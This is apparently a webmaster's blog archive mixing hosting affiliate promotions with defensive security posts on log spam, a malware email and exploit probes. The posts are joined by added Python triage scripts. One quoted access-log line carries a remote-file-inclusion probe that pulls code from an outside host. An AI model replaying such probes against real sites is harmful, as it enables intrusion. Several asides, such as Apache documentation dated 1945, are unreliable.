First of all, before you can have a public web site in your own name, hosted professionally, it needs to have its name (e.g. example.com, example.net) registered through an ICANN Accredited Registrar. So, when I want to create a new web site, I pick an available name (or add dashes or letters until I find an available variation) at Dotster.com and pay a small annual fee to register that domain name.

Once you register a domain name, the next step is to get it professionally hosted, so it can be found by search engines and indexed. The "indexing" of web sites by search engine "spiders," like those operated by Google, Yahoo, Bing, etc., occurs when they "crawl" all publicly accessible websites for content. When they find new content, it gets added to their search databases. If you create a new site about the endochronic properties of triple resublimated Thiotimolene, register a domain name and have it professionally hosted, searchers looking for such mundane information will see lists of related search results and eventually, your site will be among those shown in the search results (it takes time for a new web site to appear in most search results, sometimes months).

The Summer 2013 specials at Dotster, Domain.com and MyDomain



May 29, 2013

Get web hosting with Hostgator, at 20% off, via my links

May 30, 2013

I am an affiliate for Hostgator, which is a premier web hosting company in the USA. I was just informed that they are putting all of their (new) hosting packages on sale, at 20% off (51% off sale has ended). This discount applies to your first invoice, which can cover up to 3 years.

Hostgator offers a wide variety of hosting packages, ranging from shared accounts, to reseller, to VPS, to dedicated servers. With this current promotion, a 3 year contract for shared hosting would cost as little as $3.96 a month (prepaid), for the Hatchling Plan, or $6.96/month for the Baby Plan, or $10.36/month for the Business Plan - which includes a private SSL certificate and IP address (a must for serious e-commerce stores). VPS (Virtual Private Server) accounts start at only $19.95/month and dedicated servers can be leased for as low as $174/month.

Read the details and compare all hosting plans here.

These minimum prices are all based on a 3 year initial period. The rates are slightly higher for shorter terms. After the initial contract is up, you would have to renew at the going rate for your plan (the same with almost all web hosts.). If your hosting is coming up for renewal and the price is more than you are prepared to pay, this 20% off deal may be exactly what you were looking for.


April 7, 2013

Websites attacked daily from former Soviet Union IP addresses


Every day I read my website's raw access logs, looking for things most people ignore. Of course I want to know which search engines are sending me traffic to various pages I wrote and which pages are doing the best. But, more importantly to me, I want to know who is trying to hack my website.

When I talk to others about their websites, most of them are totally absorbed in getting the most visitors (and sales or exposure), meaning they are interested in SEO. That is a good thing, if done properly, not using spammy or blackhat tactics. They also ask about my opinions on this or that easy-to-install script that is offered by their web host. These scripts include blogs, shopping carts, CMS programs, image galleries, forums and the like. All of these add-on web software programs increase the user interactions between your website and its visitors. But, they also make your website more vulnerable to hackers.

As I read my access logs I see numerous attacks targeting various commonly installed website programs and scripts. Every single day there are dozens of probes for a WordPress login screen or admin panel. Image uploaders and themes are targeted constantly. Certain popular shopping carts are frequent targets. Plus, there seems to be a non-stop attempt by spammers to post spam comments and trackbacks on any form that accepts user input.

One thing that most of the various and sundry attacks and probes have in common is where they come from (in IP space). Server hack attempts come mostly from Chinese IP addresses. WordPress login attempts and blog spam POSTS come mostly from Russian and Ukrainian IP addresses. Some spammers use a compromised computer or server in a different country as a relay.



December 5, 2012

How to block Russian spammers from your Apache hosted website

December 5, 2012

I am posting this article for other Webmasters who are having problems with Russian based access log, blog, forum, contact form, or guestbook spammers. Any website that allows the public to post anything to its pages, or to contact the owner or Webmaster, is eventually going to attract the attention of Russian speaking spammers.

I know this from my own experiences running several domains as both the owner and as a Webmaster for other people. If you have any forms that allow others to post to them, the spammers will come. They sometimes just spam the "Referer" field in our website access logs, by posting links to shady websites promoting illicit drugs, counterfeit goods, phony product reviews, etc. They do this just in case your server is configured to publish your raw access logs to the public (a really bad idea!). This is known as "Referer Spam" and it is meant to post links to these often bad websites inside access logs that anybody might be reviewing.

Referrer spam has little chance of success, so website spammers prefer to post spam links and comments on blogs, forums, guestbooks and feedback forms. Since many websites provide some or all of these contact options, it's no surprise that they are often overrun by comment spammers. My access logs reveal that most of the comment spam sources are Russian speaking persons or bots, often emanating from IP addresses in the former Soviet Union.

I have nothing to sell to anybody in the former Soviet Union and have no use for Russian spammers, so I block access to traffic coming from there. Here are some of the ways I do this.



December 7, 2011

Access log "Referer" spam still happening through 2011

Takeaway:

I write about a lot of different types of spam, but one of the oldest, next to email and USENET, is spamming the "REFERER" field on a website's raw access logs. I have been seeing this form of spam for over a decade now.


What is a raw access log?

Websites are usually set up or configured to generate a text or graphical log of all visits to those sites (a.k.a: "hits"). These logs contain information that is useful to Webmasters of the websites. Graphical access logs use pie or column charts to show where the hits are coming from, who sent them to you, what details they were searching for and other useful facts about each request. A "raw access log" presents these details in plain text format, in space-separated groups.


Why would anybody want to spam a website's raw access logs?

Over a decade ago, spammers learned that some website owners, or free hosting companies, or individuals hosting their own web servers at home (usually against T.O.S) were actually publishing their raw access logs so that the owners could read them in a web browser, from anywhere they might be. Most of these published access logs are not password protected, meaning anybody anywhere can view them, if they know the location of those website log files. Since so many people do not understand website security at all, they leave configurations in a default state. This means that if their raw access logs are published, the folder location will be predictable, based upon the operating system of the web server. That web server is usually the Apache Web Server.

Thus, when spammers began seeing website raw access logs that were in default folder locations, on various web servers, they could read them in their browsers, as could anybody else in the World who reads that language. So, some enterprising S.O.B. came up with the brilliant idea of posting a request for some files on some websites, and they decided to include fake "referrer" details.


What is the referrer field in an Access log?

The referrer field is a section of an access log that tells the owner/maintainer of the website where each visitor came from, just before they came to your website. In other words, who referred them to you. This information is extremely valuable for learning who links to your web pages, or is writing about you, or has found your site by means of a search engine result.


What do spammers do to referrer fields to turn them into spam?

Instead of revealing the actual referring page location of the website that the visitor (human or machine) was visiting when they decided to come to yours, spammers use special web software programs to create whatever content they wish to present for the referer field. That special content usually takes the form of spammy links containing the names of illicit goods (illicit prescription drugs, counterfeit goods), or services (shady or illegal businesses).


Did I just misspell "referrer" as "referer?"

Nope. When the original Apache Web Server documentation was written, back in 1945, the scientists working on it accidentally misspelled the word Referrer as Referer. This misspelling has stayed with us to this very day!


Now, on to the rest of the details about Referer spam.



November 24, 2011

Web hosting special at HostGator: 50% Off, Extended to Nov 28

UPDATED on Nov 28, 2011, for Cyber Monday!

Are You Looking for Web Hosting With Quality Support? 24/7 Support Via Phone, Live Chat, and Email! Look no farther! HostGator is having its annual Black Friday Cyber Monday half price sale, beginning at 12:01 AM, November 28, and running until 11:59 PM, Nov 28, 2011, CST. All hosting types are included, from shared annual, to monthly, to dedicated servers.

The time zone conversions should revolve around Central Standard Time as the reference. So, if you are in the Eastern time zone, the sale begins at 1 AM Nov 28 and ends at 12:59 AM on Nov 29. You will know if you are within the sale time because the HostGator website has been updated for the 50% off deal.

Here are the details for the Black Friday Cyber Monday sale:

50% OFF on ALL hosting services. This includes shared hosting (as low as $2.48/month prepaid), reseller hosting, VPS hosting, Dedicated servers and Windows hosting! This does not include domain names.

Purchasers do NOT need to insert a coupon code to receive the special. The correct coupon code will automatically be inserted on all orders placed on Black Friday.

The discount applies to the client's first invoice. HostGator's VPS and dedicated server hosting services are only available on a monthly basis, therefore the promotion will apply to only the first month.


Get hosted with HostGator, for half price

Read the details about HostGator's various webhosting accounts

If you are ready to open an account with HostGator, Use this link.


September 22, 2011

Domain suspended email notice contains malware attachment

Today I saw something new to me in the spam-containing-malware category. It was an email allegedly from one account on my own domain, sent to another existing account on my domain, notifying me that my domain had been suspended! FAIL!

Keep in mind as you read this, that I received this scam email from one of the email accounts on the supposedly suspended domain! I am posting about it on my blog, which is also hosted under the same domain name! A simple check for my home page shows that it is still up and running. Obviously, the email was a scam, attempting to panic me into opening the attached file. Not going to happen Boris!

Here, for both your amusement and to warn other domain/website owners about the scam, are the significant details from the normally hidden headers.

Received: from home-d805cd5a06 by smtp.wanadoo.fr; Thu, 22 Sep 2011 08:52:00 +0200
Date: Thu, 22 Sep 2011 08:52:00 +0200
Message-ID: <[email protected]>
Subject: Fw: IMPORTANT: wizcrafts.net has been suspended
From: REMOVED@wizcrafts.net
Reply-To: REMOVED@wizcrafts.net
To: REMOVED@wizcrafts.net
Content-Type: text/plain; charset=iso-8859-2



Here is what I saw when I examined the source code in the message body:

aEBb,
lGBf WLHZmMor Qu EpMu JDnky, kSr XuEPqWXQa?
a ue UBpyIYe opY QOdzUCjY.

jZKlDtiul,
tFJLfI wSMDlTD

------------F0C3F295E295E05
Content-Type: application/zip; name="Domain_Abuse_SBL141309_0920.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Domain_Abuse_SBL141309_0920.zip"



Let's examine these items, one at a time, and see what they reveal about this message. You can apply the same techniques should you be a domain owner and receive a similar email scam.
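As an added example (not code from the post), here is a small Python header-triage script that checks the items above one at a time: a self-addressed sender whose first Received hop is an outside mail server, a bare HELO name with no domain, an alarming subject, and a zip attachment. The REMOVED mailboxes and the Message-ID are replaced with constructed placeholders, since the post redacts them.

```python
"""Triage the headers of a suspicious 'domain suspended' e-mail.

Added example, not the blog's own code. Given the message headers and the MIME
headers of the attachment, report the indicators a domain owner can check by
hand. Sample values come from the headers quoted in the post; the redacted
mailboxes and Message-ID are filled with constructed placeholders.
"""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample based on the post's headers (REMOVED -> placeholder 'owner').
SAMPLE_HEADERS = """\
Received: from home-d805cd5a06 by smtp.wanadoo.fr; Thu, 22 Sep 2011 08:52:00 +0200
Date: Thu, 22 Sep 2011 08:52:00 +0200
Message-ID: <placeholder-id@wizcrafts.net>
Subject: Fw: IMPORTANT: wizcrafts.net has been suspended
From: owner@wizcrafts.net
Reply-To: owner@wizcrafts.net
To: owner@wizcrafts.net
Content-Type: text/plain; charset=iso-8859-2
"""

SAMPLE_ATTACHMENT_HEADERS = """\
Content-Type: application/zip; name="Domain_Abuse_SBL141309_0920.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Domain_Abuse_SBL141309_0920.zip"
"""

URGENT_WORDS = ("suspended", "important", "abuse", "terminated")
RISKY_ATTACHMENT_TYPES = ("application/zip", "application/x-zip-compressed",
                          "application/octet-stream", "application/x-msdownload")


def domain_of(addr):
    """Return the lower-cased domain part of an e-mail address, or ''."""
    _, address = parseaddr(addr or "")
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def parse_received(value):
    """Split a 'from X by Y; date' Received header into (helo_name, server)."""
    m = re.match(r"\s*from\s+(\S+)\s+by\s+(\S+)", value or "")
    return (m.group(1), m.group(2).rstrip(";")) if m else ("", "")


def under_domain(host, domain):
    """True when host is the domain itself or a host inside it."""
    return host == domain or host.endswith("." + domain)


def triage(header_text, attachment_header_text=""):
    """Return a list of human-readable indicators found in the headers."""
    msg = message_from_string(header_text)
    findings = []
    from_dom, to_dom = domain_of(msg["From"]), domain_of(msg["To"])
    helo, by_server = parse_received(msg["Received"])
    # Mail 'from' my own domain, addressed to my own domain, that first appeared
    # at a server outside that domain is a spoofed sender: my own mail server
    # never handled it.
    if from_dom and from_dom == to_dom and by_server and not under_domain(by_server, from_dom):
        findings.append(f"self-addressed mail for {from_dom} first seen at outside server {by_server}")
    # Real mail servers announce a fully qualified name; a bare name like a home
    # PC's computer name is typical of a compromised client sending directly.
    if helo and "." not in helo:
        findings.append(f"HELO name '{helo}' has no domain part")
    subject = (msg["Subject"] or "").lower()
    if any(word in subject for word in URGENT_WORDS):
        findings.append(f"alarming subject: {msg['Subject']}")
    if attachment_header_text:
        part = message_from_string(attachment_header_text)
        ctype = part.get_content_type()
        disposition = (part["Content-Disposition"] or "").lower()
        if ctype in RISKY_ATTACHMENT_TYPES and "attachment" in disposition:
            findings.append(f"{ctype} attachment '{part.get_filename()}'")
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_HEADERS, SAMPLE_ATTACHMENT_HEADERS):
        print("-", line)
```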



August 22, 2011

Huge Coppermine Maze Theme Attack on Aug 21-22, 2011

I have detected a huge exploit probe attack against the Maze theme interface for Coppermine web photo galleries, targeting my blog. Hundreds of probes were launched tonight, August 21 through 22, 2011, from the IP address 64.31.60.72 - a static IP which belongs to Limestone Networks, in Dallas, Texas.

Here is a tiny excerpt of the attack, meant to exploit a vulnerability in the Coppermine-Maze Theme, to include hostile files and codes into a blog, or photo gallery, via a vulnerable and unpatched Coppermine theme:

64.31.60.72 - - [21/Aug/2011:14:55:18 -0600] "GET /blogs/2009/11//modules/coppermine/themes/maze/theme.php?THEME_DIR=http://184.22.121.212:60000/byroe.jpg?? HTTP/1.1" 405 766 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

You will note that the URL where the exploit code is hosted is shown to be http://184.22.121.212 - which resolves to 184-22-121-212.static.hostnoc.net. The exploit is defined in the RFI (Remote File Inclusion) Vulnerabilities Scanner, at the OSSEC Wiki, as: "$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";" That exploit code has been in the wild since April 2004, according to Security Tracker.

If you are running the Coppermine Photo Gallery software on a website under your control, check your access logs to see if you have been hit by this attack. Then, look at the server response codes and see if any are code 200. If so, you are probably hacked. I feed them a Server 405: Method Not Allowed. Next, log into your Coppermine admin panel and go over every setting to see what, if anything, has been changed without your knowledge. Visit your gallery, using Firefox, with the NoScript add-on installed and active. View the Source code of your Gallery web pages and press Control + A to highlight all text and codes. Look for 1x1 px iframes with links to outside websites and other bad codes, like JavaScript or meta refresh redirects.

Remove any hostile changes, then save the cleaned pages. Check your server permissions to make sure that they are not writable by the World; just the Owner (You). 644 is the safest permission (Read-Write for Owner, Read-only for Group and World) for html, script, and php files. Seek updates for Coppermine and for any themes you are using with it. Notify your web host of the exploit and have them run a vulnerability scan on your remaining pages and clean up anything you overlooked.

If you use an FTP client to upload files to your website, you can establish permissions on each remote file. Check the Help file that is part of the FTP program. If you use WS_FTP, on a Linux/Unix host, there is a right-click option labeled Properties, which opens a box that sets the numeric or actions permissions for any selected file, or group of selected files. Clicking OK after changing permissions makes the change take effect. If you see PHP or HTML files with 664, or 666 permissions, change them to 644, unless you know that they are safe to be left writable by the World (aka: Everyone) and Group.

If you use a web interface to manage files on your server, check the instructions for how to set or change file permissions on the server.

According to the Coppermine home page news, the latest stable version containing security patches is cpg1.5.12 (Security release - upgrade mandatory!), dated 02 January 2011. There is a very recent maintenance release: cpg1.5.14, dated August 1, 2011. I advise you to upgrade to the latest version on the Coppermine home page, if you have any older version number. Get on their mailing list to be notified about security updates, as they are issued.

Stay safe and keep your website safe for your visitors. As a Webmaster you must practice safe Hex! Do not assume that your web host will update software you have chosen to install. They won't do anything except shut down your account when it gets reported for infecting innocent visitors. If you don't know how to update web software, call your web host, ask for technical support and request assistance updating your galleries, blogs, themes, etc. They may charge you a fee, or not. You install it, you update it! It gets hacked, you fix it!


August 3, 2011

Websites using WordPress image resizing themes need to take action Now

If you are a website owner or Webmaster and have installed WordPress blog software with image gallery themes on your websites, you may have a big problem, effective 8/1/2011. These programs are complicated software and, as such, are subject to flaws caused by programming oversights. Exploitable scripting flaws have been discovered in a popular plug-in for themes: TimThumb. Those flaws are currently being used to inject malicious scripts and codes into millions of web pages. You need to see if your website is vulnerable to these exploits in the wild.

The details

This particular problem doesn't lie inside the WordPress software itself, but in a third party "plug-in" used by image themes that allow resizing of uploaded images. Those images may be uploaded by the owner of the blog, or by visitors from the Internet. Therein lies the danger.

First of all, you must be running the most current version of WordPress, which at this writing is v 3.2.1, preferably, with only themes approved and delivered through the WordPress website. This will protect the WordPress software itself, until a new vulnerability is discovered and published by hacker groups. Always get on the WordPress mailing list so you are notified when new versions are released. I recommend you bookmark and read this page often: http://wordpress.org/news/category/security/

You still need to check any theme directories (aka Folders) for the presence of the currently exploited file. If you are using an older version of WordPress, you had better upgrade first, at http://wordpress.org/.

The file currently being exploited by remote scanning scripts is named TimThumb.php. This file is used to resize images that are allowed to be uploaded to photo galleries. TimThumb is "inherently insecure" because it writes files into a temporary cache directory when it fetches an image and resizes it. But that directory, which is a sub-directory of your main WordPress directory, is accessible to people visiting the website. An attacker can compromise the site by figuring out how to get TimThumb to grab a malicious PHP file and put it in the WordPress directory. The code will be executed if an attacker then accesses the file using a Web browser.
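An added example (not code from the post, WordPress or TimThumb) that carries out the check described above: walk a themes tree for copies of TimThumb, read the version each declares, and inspect the cache directory beside it. The file names it looks for, the define('VERSION', ...) pattern and the .htaccess check are assumptions, stated again in the code.

```python
"""Find TimThumb copies under a WordPress themes tree and report their state.

Added example; not code from the post, WordPress or TimThumb. It does what the
post advises: look through every theme directory for the exploited file, read
the version string it declares and check the cache directory next to it, which
the post explains is reachable by visitors. Assumptions: TimThumb declares its
version as define('VERSION', '...'), themes sometimes ship it renamed to
thumb.php, and a cache directory counts as protected when it carries an
.htaccess (the usual hardening; the file's contents are not checked here).
"""
import os
import re
import stat

TIMTHUMB_NAMES = {"timthumb.php", "thumb.php"}  # assumed common file names
VERSION_RE = re.compile(r"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]")


def parse_timthumb_version(source):
    """Return the version string a TimThumb source file declares, or None."""
    m = VERSION_RE.search(source)
    return m.group(1) if m else None


def is_timthumb_name(filename):
    """Case-insensitive match against the file names TimThumb is shipped under."""
    return filename.lower() in TIMTHUMB_NAMES


def assess_cache_dir(mode, has_htaccess):
    """List the problems of a cache directory, given its st_mode and whether an
    .htaccess is present to restrict direct requests to the cached files."""
    issues = []
    if mode & stat.S_IWOTH:
        issues.append("world-writable")
    if not has_htaccess:
        issues.append("no .htaccess restricting requests")
    return issues


def scan_theme_tree(themes_root):
    """Walk a wp-content/themes tree; return one dict per TimThumb copy found."""
    findings = []
    for dirpath, _dirs, files in os.walk(themes_root):
        for name in files:
            if not is_timthumb_name(name):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                version = parse_timthumb_version(fh.read())
            # TimThumb writes resized images into a 'cache' directory beside itself.
            cache = os.path.join(dirpath, "cache")
            cache_issues = []
            if os.path.isdir(cache):
                cache_issues = assess_cache_dir(
                    os.stat(cache).st_mode,
                    os.path.isfile(os.path.join(cache, ".htaccess")))
            findings.append({"path": path, "version": version,
                             "cache_issues": cache_issues})
    return findings


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "wp-content/themes"
    for f in scan_theme_tree(root):
        print(f["path"], f["version"] or "no version string",
              "; ".join(f["cache_issues"]) or "cache OK or absent")
```

Compare every version it reports against the current release on the TimThumb project page before deciding a copy is safe; a file with no version string at all deserves the same suspicion as an old one.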



August 1, 2011

Evidence linking Romanian spammers to Ubiquity Servers

On July 27, 2011, I published a blog article about blog spam scripts running on Ubiquity Servers. For several days those POST attempts from Ubiquity IP space disappeared. They returned today, leading me to a most interesting discovery about the source.

Let me show you how I find information about access log spam attempts and deal with them.

In today's first blog spam attempt, an unknown visitor, with the IP address 108.62.150.52, attempted to POST a trackback comment to my Movable Type blog. If the POST was made by a real person, and if that person understood and read the English language, he or she would have read the bold notice that my blog does not accept either comments or trackbacks.

Of course, if the POST was made by a script, it would neither see that notice, nor care about it. Similarly, if the POST was being attempted by somebody in a very foreign country, in say Romania, they would not understand the text in notices I post on every page, regarding no trackbacks allowed. And from where did this POST originate? Romania!

Here then, without any ado, is the chain of evidence linking a blog spam attempt to Romania, from whence a huge amount of spam and online exploits have been traced.



July 27, 2011

Blog spam scripts still running on Ubiquity Servers

In 2009 I wrote about trackback spammers using scripts they have installed on servers owned by Ubiquity Server Solutions and Nobis Technology Group before. After 1.5 years they still haven't cleaned up this abuse. It seems that every day or two I see numerous POST attempts to my blog, which are either comment or trackback spam.

I'd like to let the people installing these scripts targeting my blog know that, in my case, their efforts are futile. That is because I run a Perl based Movable Type blog and these spam scripts assume that the target is running on a more common, but less secure, PHP driven blog, usually Wordpress.

It appears that if one uses WordPress as their blog software, a simple POST command is sufficient to post comments or trackbacks to that blog page. Not so with Movable Type! With MT, one must visit a particular scripted page to submit a comment or a trackback. Not only must they have valid credentials to submit, but anything submitted is held until the owner of the blog approves that submission. It goes without saying that nobody in his or her right mind is going to approve spam comments or trackbacks!

I take matters one step farther: I do not accept either comments or trackbacks on any of my blog articles. It says so right at the top of every page on this blog. Yes, I have the scripts installed to do comments and trackbacks, but, they are disabled in the Dashboard. I can't even comment on my own posts. If the time ever comes where I feel like allowing public comments, it will only be from people holding approved credentials and then, all comments would be held for moderation. Nothing would ever get posted that was in any way spammy!

This brings me back to the title of this article. A majority of the failed attempted spam comments and trackbacks are emanating from IP space under the control of Ubiquity Server Solutions. In the last few days I have logged several attempts coming from various IP addresses covered by the following CIDR ranges: 173.234.124.0/22, 173.234.172.0/22 and 173.234.184.0/22. All of these CIDRs are part of the entire Class C network assigned to Ubiquity and Nobis: 173.234.0.0/16.

Note: This CIDR is not the only one assigned to Ubiquity Servers. They hold several other ranges.

So, they're spamming your blogs ... Let's block them from your Apache hosted websites...
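The two access-log checks described on this page, hunting the Coppermine Maze THEME_DIR= probe and its response codes (August 22, 2011 post) and spotting spam POSTs from the Ubiquity ranges listed above, share the same log parser, so here they are in one added Python example (not the blog's own code). The first sample line is the probe quoted in the Coppermine post; the other lines are constructed, using RFC 5737 documentation addresses for ordinary visitors and an address inside the quoted 173.234.124.0/22 range for the POST.

```python
"""Triage Apache combined-format access log lines for two patterns described
on this blog: remote-file-inclusion probes such as the Coppermine Maze
THEME_DIR= request (any query parameter whose value is a URL) and POST
attempts from ranges you have decided to block. Added example, not the blog's
own code. The first sample line is the Coppermine probe the blog quotes; the
rest are constructed.
"""
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# The CIDR ranges the July 27, 2011 post lists for Ubiquity/Nobis.
BLOCKED_RANGES = [ipaddress.ip_network(c) for c in
                  ("173.234.124.0/22", "173.234.172.0/22", "173.234.184.0/22")]

# Line 1 is quoted from the blog; lines 2-4 are constructed sample traffic.
SAMPLE_LOG = """\
64.31.60.72 - - [21/Aug/2011:14:55:18 -0600] "GET /blogs/2009/11//modules/coppermine/themes/maze/theme.php?THEME_DIR=http://184.22.121.212:60000/byroe.jpg?? HTTP/1.1" 405 766 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
192.0.2.10 - - [21/Aug/2011:15:01:02 -0600] "GET /gallery/themes/maze/theme.php?THEME_DIR=http%3A%2F%2F203.0.113.5%2Fx.txt%3F HTTP/1.1" 200 2048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
173.234.124.17 - - [27/Jul/2011:09:12:44 -0600] "POST /cgi-bin/mt/mt-tb.cgi/1234 HTTP/1.1" 403 512 "-" "Mozilla/5.0 (Windows NT 5.1) Trackback"
198.51.100.7 - - [27/Jul/2011:09:15:00 -0600] "GET /blogs/2011/07/index.html HTTP/1.1" 200 10240 "http://www.example.com/links.html" "Mozilla/5.0 (Windows NT 6.1)"
"""


def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def url_valued_params(target):
    """Return (name, value) pairs from the query string whose value is a URL.

    parse_qsl decodes percent-encoding, so an encoded http%3A%2F%2F is caught
    as well as a bare http://.
    """
    query = urlsplit(target).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if value.lower().startswith(("http://", "https://", "ftp://"))]


def in_blocked_range(ip, ranges=BLOCKED_RANGES):
    """True when the address falls inside any of the blocked networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in ranges)


def triage_log(text, ranges=BLOCKED_RANGES):
    """Return one finding dict per suspicious line. A 200 on an RFI probe is
    the case the Coppermine post says to treat as a probable compromise."""
    findings = []
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        status = int(rec["status"])
        for name, value in url_valued_params(rec["target"]):
            findings.append({"ip": rec["ip"], "kind": "rfi-probe", "status": status,
                             "detail": f"{name}={value}",
                             "severity": "high" if status == 200 else "low"})
        if rec["method"] == "POST" and in_blocked_range(rec["ip"], ranges):
            findings.append({"ip": rec["ip"], "kind": "post-from-blocked-range",
                             "status": status, "detail": rec["target"],
                             "severity": "medium"})
    return findings


def ranges_within(cidrs, parent):
    """True when every CIDR lies inside the parent network (e.g. the /16)."""
    p = ipaddress.ip_network(parent)
    return all(ipaddress.ip_network(c).subnet_of(p) for c in cidrs)


if __name__ == "__main__":
    for f in triage_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["kind"], f["ip"], f["status"], f["detail"])
```

Feed it your own raw access log (triage_log(open("access_log").read())) and review every "high" line first; the status code tells you whether the probe was served or refused.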



June 13, 2011

Sometimes spamming does not pay!

You'd think that with the seemingly unstoppable flow of all types of spam, that it must pay fairly decently. It does, for the upper echelon of professional spammers and their top affiliates. But, not necessarily for the lower ranks or those engaging in spam on their own.

Still, paying (for spammers) or not, the spam flood continues. It seems like an impossible task for us little guys to do anything to stop it. But is it really impossible for individual spam recipients to fight back and stop it? Not in this case!

So begins my story, where this little guy was able to make a big difference against a determined spammer. The spam I'm writing about is not your usual type, although it may have also been delivered to others through more typical means. This type of spam is where domain owners, or hired agents post spam links to the websites they are "spamvertising" - in the access logs of innocent websites. This is known as "log spam." They do this in the hopes that these logs may be published for the World to see, and show up in search results for the spamvertised keywords.

Since I have owned domains I have read my access logs, both to see where traffic comes from, and to catch bad behavior before it gets out of control. During the early to mid 2000's, from about 2002 through 2006, it was very common to see spam comments and links posted to a website's access logs, from remote visitors. These visitors were not usually human, but were often automated scripts written to post spam links in the "REFERER" field (that is how it is misspelled in the Apache Server documentation) of typical web logs. The reason they did this was because many cheaply or freely hosted websites published those access logs as viewable by the public, by default.

Fast forward to 2011 and despite the fact that most websites, like mine, have only privately accessible logs, the people wanting to spamvertise their new, often unfriendly websites will employ every tactic available to them. Thus, the spammer who wanted to promote his two new websites decided to post REFERER spam to my access logs. At first this was just an oddity that caught my eye, as I perused the hundreds of lines of hits to my main site. However, I am not your typical Webmaster and I don't have a typical viewpoint for seeing things, with my trained eyes.

Over a period of two weeks I noticed a repeating pattern of obvious spam links for two domains, coming at a short, predictable interval, from two closely related IP addresses. The IP addresses led to a broadband ISP in Czechoslovakia. The websites they were promoting were hosted by a well known hosting company here, in the USA.

Read my extended comments for the rest of the story.



June 6, 2011

The Toledo Industrial Sewing Machines website is online

After months of preparation and one trip to Toledo, to take photographs, I have finally managed to get the initial version of the Toledo Industrial Sewing Machines website online. It has been quite a task, trying to catch the owner, Bob Kovar, in between him answering phone calls and setting up and repairing industrial sewing machines.

The business is located at 3631 Marine Road, near the airport, in Toledo, Ohio. The building is huge and is thoroughly polluted with industrial sewing machines. They are everywhere; on racks, tables, counters, and on the floor. If it's a sewing machine and built for professional use, they probably have it in stock! I'm talking bar tackers, sergers, walking foot machines, needle feed machines, zig-zaggers, button machines, tailors' machines, shoe patchers, cylinder arm machines, post machines, portable walking foot machines, and ... the entire line of Cowboy sewing equipment. They also have a huge stock of replacement parts, needles, bobbins, etc., and nylon thread, in sizes from #46 up to #346.

The website was primarily designed around the Cowboy brand machines, which are highly favored by professional and semi-pro leather crafters. These big leather stitchers are able to sew through 7/8 inch of veg-tan or bridle leather and are used to make holsters, halters, saddles, bridles, reins, dress, gun and weight belts, and all manner of cases, pouches, sheathes and leather bags.

I still have a lot more work to do on the website, but I invite you to go to www.tolindsewmach.com and take a look around. If you know somebody who needs an industrial sewing machine, or a big leather stitcher, tell them about Toledo Industrial Sewing Machines!

If you are looking for a Webmaster, please contact me! I have reasonable hourly rates.


November 28, 2010

HostGator extends 50% web hosting discount to Cyber Monday

On Thursday night I wrote a blog article about the then upcoming Black Friday super sale at HostGator web hosting. That sale has come and gone, but, due to popular demand, HostGator is going to run their 50% off all hosting packages and lengths of contract, on Cyber Monday, November 29, 2010. Here are the basic details you need to know.

1: This is a straight 50% off sale, based solely on your first invoice as a new customer.

2: All HostGator hosting packages are included. This means whether you want the cheapest shared hosting or your own dedicated server, you will be invoiced 1/2 of list price.

3: Since the discount only comes off your first invoice, it is wise to buy into as long a term as you can afford. Renewals will be at the going rate, when they come due.

4: This deal does not apply to existing customers with current accounts on HostGator.

5: All you have to do is sign up for any hosting service online at the HostGator website and the 50% off coupon will be AUTOMATICALLY applied.

This is what a typical deal will cost you, based on the four most popular types and lengths of hosting (longer and shorter terms are available):

Shared Hosting: ONLY $2.48/month
Reseller Hosting: ONLY $12.48/month
VPS Hosting: ONLY $9.98 First Month
Dedicated Servers: ONLY $87 First Month

Note: You can get a free domain with your purchase of a hosting package, should you need one. Otherwise, you can transfer your existing domains for free. Here are just a few of the features included in the shared hosting accounts.

* Unlimited Disk Space
* Unlimited Bandwidth
* Free SiteBuilder (Try Demo)
* Easy Control Panel (Try Demo)
* 1-Click Script Installs
* 4,500 Free Website Templates
* 99.9% Uptime Guarantee
* 45 Day Money Back Guarantee
* 24/7/365 Technical Support
* $100 Google AdWords Credit

Get HostGator Web Hosting Now! This promotion will only run Monday November 29th, from 12:00AM to 11:59PM CST (-6 GMT).

If you miss out on this discount, HostGator still has shared hosting plans for as little as $4.95 per month.


November 25, 2010

HostGator offers unbelievable 50% to 80% off on Black Friday

If you own domain names and have hosting that is too expensive (especially come renewal time), or want to create your first website, but don't want to be locked into high monthly or annual prices, HostGator has the deal of a lifetime. For one day only, Friday, November 26, 2010, beginning at 12:00 AM Central Standard Time, HostGator is offering the following humongous discounts on all of their web hosting packages (regular $4.95/month for shared hosting, up to $174/month for a dedicated server).

  • 50% OFF EVERYTHING From 12:00AM CST to 5AM CST
  • 80% OFF EVERYTHING From 5AM to 9AM CST (While Spaces last)
  • From 9AM to 11:59PM CST, or after all 80% off accounts have sold out, they will continue to offer 50% OFF ALL HOSTING PACKAGES

